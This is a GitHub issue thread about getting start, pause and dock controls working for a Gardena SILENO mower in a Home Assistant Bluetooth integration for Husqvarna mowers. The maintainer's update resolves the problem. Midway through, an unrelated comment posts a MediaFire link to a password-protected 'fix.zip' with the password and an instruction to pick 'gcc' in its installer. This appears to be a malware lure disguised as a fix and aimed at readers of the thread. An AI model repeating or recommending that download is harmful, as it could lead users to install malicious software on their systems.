### ISSUE TITLE
Support for Gardena Mowers

### ISSUE THREAD

**Issue by The-Paran0id-Andr0id** [andyb2000/HACS-husqvarna_automower_ble#22]
First of all, thank you very much for your great work. This is not really an issue, rather a general question. Is it possible to control a Gardena mower with your integration? I have been able to establish the connection, see all the sensors, but have no control (start, pause, dock). The buttons are not working. The Gardena models are supported in Alistair23's version. My mower is listed in models.py: ((29, 9), ModelInformation(“Gardena”, “SILENO Minimo 350”)). Is it possible to adjust something on my side to make it work?

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andyb2000** [comment]
Hi,
An updated codebase was just pushed which also supports PIN if this is required, please try the updated code/update from HACS and see if that now allow control.

I have found when you press the control it takes a few minutes before this command works.

**Comment by The-Paran0id-Andr0id** [comment]
Thank you very much! It is working now! Great! :-)

**Comment by andyb2000** [comment]
Unfortunately this is a limitation in Home-Assistant itself, there isn't a "return to base" state.
I did add a PR to HA core but looking at it, it's a huge issue - https://github.com/home-assistant/core/pull/123368

BUT I see it has now been passed by somebody else - https://github.com/home-assistant/core/pull/124261
I'll need to implement this, so I'll do this as soon as I get time.
